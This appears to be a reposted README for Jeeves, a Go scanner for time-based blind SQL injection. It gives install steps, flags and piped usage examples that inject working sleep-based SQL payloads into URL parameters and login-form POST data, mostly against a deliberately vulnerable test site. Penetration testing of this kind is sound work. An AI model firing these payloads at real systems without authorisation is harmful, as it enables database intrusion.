Jeeves is made for looking to Time-Based Blind SQLInjection through recon.
Installing Jeeves
$ go install github.com/ferreiraklet/Jeeves@latest
OR
$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h
echo ‘https://redacted.com/index.php?id=your_time_based_blind_payload_here’ | jeeves -t payload_time
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves –payload-time 5
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(10)))v)” | jeeves -t 10
In –payload-time you must use the time mentioned in payload
cat targets | jeeves --payload-time 5
Pay attention to the syntax! Must be the same =>
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves -t 5 -H “Testing: testing;OtherHeader: Value;Other2: Value”
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves -t 5 –proxy “http://ip:port”
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves -t 5 -p “http://ip:port”
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves –payload-time 5 –proxy “http://ip:port” -H “User-Agent: xxxx”
Sending data through post request ( login forms, etc )
Pay attention to the syntax! Must be equal! ->
echo “https://example.com/Login.aspx” | jeeves -t 10 -d “user=(select(0)from(select(sleep(5)))v)&password=xxx”
echo “https://example.com/Login.aspx” | jeeves -t 10 -H “Header1: Value1” -d “username=admin&password=’+(select*from(select(sleep(5)))a)+'” -p “http://yourproxy:port”
You are able to use of Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, mastering his strenght
Command line flags
Usage:
-t, –payload-time, The time from payload
-p, –proxy Send traffic to a proxy
-c Set Concurrency, Default 25
-H, –headers Custom Headers
-d, –data Sending Post request with data
-h Show This Help Message
Using with sql payloads wordlist
cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done
Introduction When it comes to cybersecurity and ethical hacking, one of the most effective ways…
Introduction In the world of cybersecurity, knowledge is power. One of the most powerful skillsets…
Introduction In the vast ocean of the internet, the most powerful tool you already have…
Pystinger is a Python-based tool that enables SOCKS4 proxying and port mapping through webshells. It…
Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…
Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…